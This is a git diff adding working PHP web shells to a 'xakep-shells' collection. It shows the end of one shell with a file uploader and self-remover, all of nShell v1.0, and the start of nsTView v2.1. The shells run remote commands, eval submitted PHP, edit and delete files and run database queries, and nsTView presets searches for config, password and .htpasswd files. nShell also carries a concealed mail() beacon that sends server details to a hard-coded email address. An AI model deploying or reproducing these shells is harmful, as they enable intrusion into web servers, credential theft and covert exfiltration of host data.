+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>���������: $uploadfile20</i><br>";}
+}
+
+exit;
+break;
+case "selfremover":
+ print "<tr><td>";
+print "<center><font color=red face=verdana size=3>�� ������, ��� ������ ������� ���� ���� � �������?<br><br>
+<a href='$php_self?p=yes'>��, ����</a> | <a href='$php_self?'>���, ����� ��� �������</a><br><br><br>
+����� ������� <u>";
+$path=__FILE__;
+print $path;
+print "</u>?</td></tr></center></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="���� ���������� �������!";
+print "<tr><td><font color=red>���� $path �� ������!</td></tr>";
+}else{$hmm="������";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+break;
+
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/nshell.php.php.txt b/xakep-shells/PHP/nshell.php.php.txt
new file mode 100644
index 0000000..c5be33a
--- /dev/null
+++ b/xakep-shells/PHP/nshell.php.php.txt
@@ -0,0 +1,371 @@
+?�?<head>
+<title> nShell v1.0</title>
+<style>
+html { overflow-x: auto }
+A: {font-weight:bold};
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #444444;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+table {
+BORDER-RIGHT:  :#444444 1px outset;
+BORDER-TOP:    :#444444 1px outset;
+BORDER-LEFT:   :#444444 1px outset;
+BORDER-BOTTOM: :#444444 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    :#444444 1px solid;
+BORDER-LEFT:   :#444444 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+div,td,table {
+font-family:Georgia;
+}
+</style>
+</head>
+<body bgcolor=":#444444">
+<center>
+<?php
+error_reporting(0);
+$function=passthru; // system, exec, cmd
+$myname=$_SERVER['SCRIPT_NAME'];
+echo "<b><font color=\"#000000\" size=\"3\" face=\"Georgia\"> System information: :</font><br>";             $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+?>
+<table width="80%" border="0">
+<td colspan="3" align="center">
+<?php
+function ex($comd)
+{
+ $res = '';
+if(function_exists("system"))
+	{
+	ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+	}elseif(function_exists("passthru"))
+	{
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+	}elseif(function_exists("exec"))
+	{
+    exec($comd,$res);
+    $res=implode("\n",$res);
+	}elseif(function_exists("shell_exec"))
+	{
+	$res=shell_exec($comd);
+	}elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+ }
+ return $res;
+}
+
+// safe mod
+$safe_mode=@ini_get('safe_mode');
+echo (($safe_mode)?("<div>Safe_mode: <b><font color=green>ON</font></b>"):("Safe_mode: <b><font color=red>OFF</font></b>"));
+echo "    ";
+// phpversion
+echo "Php version<font color=\"green\"> : ".@phpversion()."</font>";
+echo "    ";
+// curl
+$curl_on = @function_exists('curl_version');
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo "    ";
+// mysql
+echo "MYSQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "    ";
+// msssql
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "    ";
+// PostgreSQL
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "    ";
+// Oracle
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "    ";
+// Disable function
+echo "Disable functions : <b>";
+$df=@ini_get('disable_functions');
+if(!$df){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+echo "    ";
+//==============xac dinh os==================
+$servsoft = $_SERVER['SERVER_SOFTWARE'];
+if (ereg("Win32", $servsoft)){
+$sertype = "win";
+}
+else
+{
+$sertype = "nix";
+}
+//=========================================
+
+$uname=ex('uname -a');
+ echo "<br>OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ $server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+echo "<font color=\"black\"><a href=".$_SERVER['PHP_SELF']."?act=info target=_blank>Php Info</a></font><br></div>";
+
+?>
+</td><tr>
+<td width="20%" align="center"><a href="<?=$myname?>?act=manager"> File Manager</a></td>
+<td width="20%" align="center"><a href="<?=$myname?>?act=sql">Sql Query</a></td>
+<td width="20%" align="center"><a href="<?=$myname?>?act=eval">Eval()</a></td><tr>
+<td colspan="3" >
+<?php
+$act=@$_GET['act'];
+if($act=="info"){
+echo "<center><font color=red size=10> Php Version :".phpversion()."</font>";
+phpinfo();
+echo "</center>";
+}
+?>
+<?php
+//=========================================================
+function perms($mode)
+{
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+//===================Delect File=============================
+$del=$_GET['del'];
+function  delfile($name)
+{
+    passthru("del ".$name);
+}
+function deldir($name)
+{
+	passthru("rmdir ".$name);
+}
+if($del)
+{
+  if(is_file($del)) delfile($del); else deldir($del);
+}
+//==================Quan li thu muc ==========================
+if($act=="manager"){
+$arr = array();
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table width=100%><tr><td align=center><b>Name</td><td align=center><b>Type</td><td align=center><b>Size</td><td align=center><b>Perms</td><td align=center>Delete</td></tr>";
+foreach ($arr as $filename) {
+if ($filename != "." and $filename != ".."){
+if (is_dir($filename) == true){
+$directory = "";
+$dc=str_replace("\\","",dirname($_SERVER['PHP_SELF']));
+$directory = $directory . "<tr><td align=center>$filename</td><td align=center>" .ucwords(filetype($filename)) . "</td><td></td><td align=center>" . perms(fileperms($filename))."<td align=center><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$dc.">Del</td>";
+$dires = $dires . $directory;
+}
+if (is_file($filename) == true){
+$file = "";
+$link=str_replace(basename($_SERVER['REDIRECT_URL']),$filename,$_SERVER['REDIRECT_URL']);
+$file = $file . "<tr><td><a href=".$link	." target=_blank>$filename</a></td><td>" .ucwords(filetype($filename)). "</td><td>" . filesize($filename) . "</td><td>" . perms(fileperms($filename))."<td><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$filename.">Del <a href=".$_SERVER['PHP_SELF']."?act=manager&file=".$filename.">Edit</a></td>";
+$files = $files . $file;
+}
+}
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+}
+// view file ex: /etc/passwd
+if(isset($_REQUEST['file']))
+	{
+$file=@$_REQUEST["file"];
+echo "<b>File :</b><font color=red>   ". $file."</font>";
+$fp=fopen($file,"r+") or die("Ban khong co quyen de ghi vao File nay , hoac do khong tim thay File");
+$src=@fread($fp,filesize($file));
+echo "<center><hr color=777777 width=100% height=115px><form action=".$_SERVER['REQUEST_URI']." method=post><TEXTAREA NAME=\"addtxt\" ROWS=\"5\" COLS=\"80\">".htmlspecialchars(stripslashes($src))."</TEXTAREA><br><input type=submit value=Save></form><hr color=777777 width=100% height=115px>";
+$addtxt=@$_POST["addtxt"];
+ rewind($fp);
+ if($addtxt=="") @fwrite($fp,stripslashes($src)); else $rs=@fwrite($fp,stripslashes($addtxt));
+ if($rs==true)
+ {
+ echo "Noi dung cua file nay da duoc sua doi !<a href=".$_SERVER['REQUEST_URI'].">Xem lai</a>";
+ }
+ ftruncate($fp,ftell($fp));
+echo "</center>";
+ }
+
+?>
+
+<?php
+// function
+function exe_u($query)
+{
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong update du lieu duoc !");
+if(mysql_affected_rows($result)>=0) echo "Affected rows : ".mysql_affected_rows($result)."This is Ok ! ^.^<br>";
+}
+function exe_c($query)
+{
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong Create duoc !");
+echo "This is Ok ! ^.^<br>" ;
+}
+function exe_d($query)
+{
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong Drop duoc  !");
+echo "This is Ok ! ^.^<br>" ;
+}
+function exe_w($query)
+{
+echo "<b><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong the show gi duoc het !");
+if(eregi("fields",$query)) {
+while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
+echo "<b><font color=red>".$row['Field']." :</font></	b> ".$row['Type'];
+echo "<br>";
+}
+} else {
+while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
+   while(list($key,$value)=each($row))
+{
+	echo "<font color=red><b>".$value."</b><font>";
+}
+echo "<br>";
+}
+}
+}
+function exe_s($query)
+{
+$arrstr=@array();$i=0;
+$arrstr=explode(" ",$query);
+$find_field=@mysql_query("show fiedls from ".$arrstr['4']);
+while($find_row=@mysql_fetch_array($find_field,MYSQL_ASSOC)){
+$i++;
+$arrstr[$i]=$find_row['Field'];
+}
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong the select gi duoc het !");
+$row=@mysql_num_rows($result);
+}
+function sql($string)
+{
+$arr=@array();
+$arr=explode(";",$string);
+for($i=0;$i<=count($arr);$i++)
+	{
+	$check_u=eregi("update",@$arr[$i]); if($check_u==true)  exe_u(@$arr[$i]);
+	$check_e=eregi("use",@$arr[$i]); if($check_u==true)  exe_u(@$arr[$i]);
+	$check_c=eregi("create",@$arr[$i]); if($check_c==true) exe_c(@$arr[$i]);
+	$check_d=eregi("drop",@$arr[$i]); if($check_d==true) exe_d(@$arr[$i]);
+	$check_w=eregi("show",@$arr[$i]); if($check_w==true) exe_w(@$arr[$i]);
+    $check_s=eregi("select",@$arr[$i]); if($check_s==true) exe_s(@$arr[$i]);
+	}
+}
+//=====xong phan function cho sql
+// Sql query
+if($act=="sql")
+{
+	 if(isset($_GET['srname'])&&isset($_GET['pass']))
+	{
+	 echo $_GET['srname'];
+if(!isset($_GET['srname'])) 	$servername=$_GET['srname'];
+   else $servername="localhost";
+$con=@mysql_connect($servername,$_GET['uname'],$_GET['pass']) or die("Khong the connect duoc !");
+$form2="<center><form method=post  action=".$_SERVER['PHP_SELF']."><TEXTAREA NAME=\"str\" ROWS=\"2\" COLS=\"60\"></TEXTAREA><br><input type=submit name=s2 value=query></form></center>";
+echo $form2;
+$str=@$_POST['str'];
+if(isset($str)) sql($str);
+	}
+	else {
+		echo "chao";
+		$form1="<center><form method=GET action='".$_SERVER['PHP_SELF']."'><table width=100% boder=0><td width=100%> User Name : <input type=text name=uname size=20> Server Name :<input name=srname type=text  size=22></td><tr><td width=100%> Password :<input type=text name=pass size=20> Port : <input type=text name=port size=20><input type=submit value=login></form></td></form></table><hr color=777777 width=100% height=115px>";
+        echo $form1;
+             }
+}
+?>
+
+<?php
+if($act=="eval"){
+$script=$_POST['script'];
+if(!$script){
+echo "<hr color=777777 width=100% height=115px><form action=".$_SERVER['']." method=post><TEXTAREA NAME=\"\" ROWS=\"5\" COLS=\"60\"></TEXTAREA><input type=submit value=Enter></form><hr color=777777 width=100% height=115px>";
+}else{
+eval($script);
+}
+}
+?>
+</td>
+</table>
+
+<font face=Webdings size=6><b>!</b></font><b><font color=\"#000000\" size=\"3\" face=\"Georgia\">nShell v1.0. Code by Navaro.</font><br><b><font color="#000000" face="Georgia">Have Fun ! {^.^} { ~.~} </font></b>
+</center>
+</body>
+
+
+ 
diff --git a/xakep-shells/PHP/nst.php.php.txt b/xakep-shells/PHP/nst.php.php.txt
new file mode 100644
index 0000000..48dc6e5
--- /dev/null
+++ b/xakep-shells/PHP/nst.php.php.txt
@@ -0,0 +1,2136 @@
+<?
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+error_reporting(E_ALL & ~E_NOTICE);
+#####cfg#####
+# use password  true / false #
+$create_password = true;
+$password = "nst666";    // default password for nstview, you can change it.
+
+# UNIX COMMANDS
+# description (nst) command
+# example: Shutdown (nst) shutdown -h now
+$fast_commands = "
+Show open ports (nst) netstat -an | grep LISTEN | grep tcp
+last root (nst) last root
+last (all users) (nst) last all
+Find all config.php in / (nst) find / -type f -name config.php
+Find all config.php in . (nst) find . -type f -name config.php
+Find all admin.php in / (nst) find / -type f -name admin.php
+Find all admin.php in . (nst) find . -type f -name admin.php
+Find all config.inc.php in / (nst) find / -type f -name config.inc.php
+Find all config.inc.php in . (nst) find . -type f -name config.inc.php
+Find all config.inc in / (nst) find / -type f -name config.inc
+Find all config.inc in . (nst) find . -type f -name config.inc
+Find all config.dat in / (nst) find / -type f -name config.dat
+Find all config.dat in . (nst) find . -type f -name config.dat
+Find all config* in / (nst) find / -type f -name config*
+Find all config* in . (nst) find . -type f -name config*
+Find all pass* in / (nst) find / -type f -name pass*
+Find all pass* in . (nst) find . -type f -name pass*
+Find all .bash_history in / (nst) find / -type f -name .bash_history
+Find all .bash_history in . (nst) find . -type f -name .bash_history
+Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
+Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
+Find all writable dirs/files in / (nst) find / -perm -2 -ls
+Find all writable dirs/files in . (nst) find . -perm -2 -ls
+Find all suid files in / (nst) find / -type f -perm -04000 -ls
+Find all suid files in . (nst) find . -type f -perm -04000 -ls
+Find all sgid files in / (nst) find / -type f -perm -02000 -ls
+Find all sgid files in . (nst) find . -type f -perm -02000 -ls
+Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
+Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
+OS Version? (nst) sysctl -a | grep version
+Kernel version? (nst) cat /proc/version
+cat syslog.conf (nst) cat /etc/syslog.conf
+Cat - Message of the day (nst) cat /etc/motd
+Cat hosts (nst) cat /etc/hosts
+Distrib name (nst) cat /etc/issue.net
+Distrib name (2) (nst) cat /etc/*-realise
+Display all process - wide output (nst) ps auxw
+Display all your process (nst) ps ux
+Interfaces (nst) ifconfig
+CPU? (nst) cat /proc/cpuinfo
+RAM (nst) free -m
+HDD space (nst) df -h
+List of Attributes (nst) lsattr -a
+Mount options (nst) cat /etc/fstab
+Is cURL installed? (nst) which curl
+Is wGET installed? (nst) which wget
+Is lynx installed? (nst) which lynx
+Is links installed? (nst) which links
+Is fetch installed? (nst) which fetch
+Is GET installed? (nst) which GET
+Is perl installed? (nst) which perl
+Where is apache (nst) whereis apache
+Where is perl (nst) whereis perl
+locate proftpd.conf (nst) locate proftpd.conf
+locate httpd.conf (nst) locate httpd.conf
+locate my.conf (nst) locate my.conf
+locate psybnc.conf (nst) locate psybnc.conf
+";
+
+
+
+# WINDOWS COMMANDS
+# description (nst) command
+# example: Delete autoexec.bat (nst) del c:\autoexec.bat
+$fast_commands_win = "
+OS Version (nst) ver
+Tasklist  (nst) tasklist
+Attributes in . (nst) attrib
+Show open ports (nst) netstat -an
+";
+
+
+
+
+
+######ver####
+$ver= "v2.1";
+#############
+$pass=$_POST['pass'];
+if($pass==$password){
+$_SESSION['nst']="$pass";
+}
+if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
+else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
+else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
+else $ip = $_SERVER['REMOTE_ADDR'];
+$ip=htmlspecialchars($ip);
+
+if($create_password==true){
+
+if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
+die("
+<title>nsTView $ver:: nst.void.ru</title>
+<center>
+<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
+<font size=1 face=verdana><center>
+<b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
+</center>
+<form method=post>
+Password:<br>
+<input type=password name=pass size=30 tabindex=1>
+</form>
+<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
+<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
+<b>Your ip:</b> ".$ip."
+</td></tr></table>
+");}
+
+}
+$d=$_GET['d'];
+
+function adds($editf){
+#if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+#}
+return $editf;
+}
+function adds2($editf){
+if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+}
+return $editf;
+}
+
+$f   = "nst_sql.txt";
+$f_d = $_GET['f_d'];
+
+if($_GET['download']){
+$download=$_GET['download'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+
+if($_GET['dump_download']){
+header("Content-disposition: attachment; filename=\"$f\";");
+header("Content-length: ".filesize($f_d."/".$f));
+header("Expires: 0");
+readfile($f_d."/".$f);
+if(is_writable($f_d."/".$f)){
+unlink($f_d."/".$f);
+}
+die;
+}
+
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+if(@$_GET['img']=="1"){
+@$e=$_GET['e'];
+header("Content-type: image/gif");
+readfile("$d/$e");
+}
+if(@$_GET['getdb']=="1"){
+header('Content-type: application/plain-text');
+header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
+}
+print "<title>nsT View $ver</title>
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>
+<script>
+function ShowOrHide(d1, d2) {
+if (d1 != '') DoDiv(d1);
+if (d2 != '') DoDiv(d2);}
+
+function DoDiv(id) {
+var item = null;
+if (document.getElementById) {
+item = document.getElementById(id);
+} else if (document.all){
+item = document.all[id];
+} else if (document.layers){
+item = document.layers[id];}
+if (!item) {}
+else if (item.style) {
+if (item.style.display == \"none\"){ item.style.display = \"\"; }
+else {item.style.display = \"none\"; }
+}else{ item.visibility = \"show\"; }}
+
+function cwd(text){
+document.sh311Form.sh3.value+=\" \"+ text;
+document.sh311Form.sh3.focus();
+}
+
+
+</script>
+";
+print "<body vlink=#0006DE>
+<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
+<tr><td><font face=wingdings size=2>0</font>";
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
+if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
+echo "</td></tr>";
+if($os=="unix"){ echo "
+<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
+<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
+[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
+[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
+[<a href='$php_self'>Home</a>]
+[<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
+[<a href='$php_self?d=$d&t=upload'>Upload</a>]
+[<a href='$php_self?t=tools'>Tools</a>]
+[<a href='$php_self?p=info'>PHPinfo</a>]
+[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
+[<a href='$php_self?p=sql'>SQL</a>]
+[<a href='$php_self?p=selfremover'>Self Remover</a>]
+</td></tr>
+";
+if($os=="win"){ echo "
+<tr><td bgcolor=white>
+<center><font face=wingdings size=2><</font>
+<a href='$php_self?d=a:/'>A</a>
+<a href='$php_self?d=b:/'>B</a>
+<a href='$php_self?d=c:/'>C</a>
+<a href='$php_self?d=d:/'>D</a>
+<a href='$php_self?d=e:/'>E</a>
+<a href='$php_self?d=f:/'>F</a>
+<a href='$php_self?d=g:/'>G</a>
+<a href='$php_self?d=h:/'>H</a>
+<a href='$php_self?d=i:/'>I</a>
+<a href='$php_self?d=j:/'>J</a>
+<a href='$php_self?d=k:/'>K</a>
+<a href='$php_self?d=l:/'>L</a>
+<a href='$php_self?d=m:/'>M</a>
+<a href='$php_self?d=n:/'>N</a>
+<a href='$php_self?d=o:/'>O</a>
+<a href='$php_self?d=p:/'>P</a>
+<a href='$php_self?d=q:/'>Q</a>
+<a href='$php_self?d=r:/'>R</a>
+<a href='$php_self?d=s:/'>S</a>
+<a href='$php_self?d=t:/'>T</a>
+<a href='$php_self?d=u:/'>U</a>
+<a href='$php_self?d=v:/'>V</a>
+<a href='$php_self?d=w:/'>W</a>
+<a href='$php_self?d=x:/'>X</a>
+<a href='$php_self?d=y:/'>Y</a>
+<a href='$php_self?d=z:/'>Z</a>
+</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
+print "<tr><td>
+:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
+<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
+<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::";
+if($os=="unix"){
+print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
+}
+print "</td></tr>";
+
+
+
+
+
+if($_GET['p']=="ftp"){
+print "<tr><td>";
+
+
+
+print "</td></tr></table>";
+print $copyr;
+exit;
+}
+
+
+
+
+
+
+
+
+
+
+if(@$_GET['p']=="sql"){
+print "<tr><td>";
+###
+
+$f_d = $_GET['f_d'];
+if(!isset($f_d)){$f_d=".";}
+if($f_d==""){$f_d=".";}
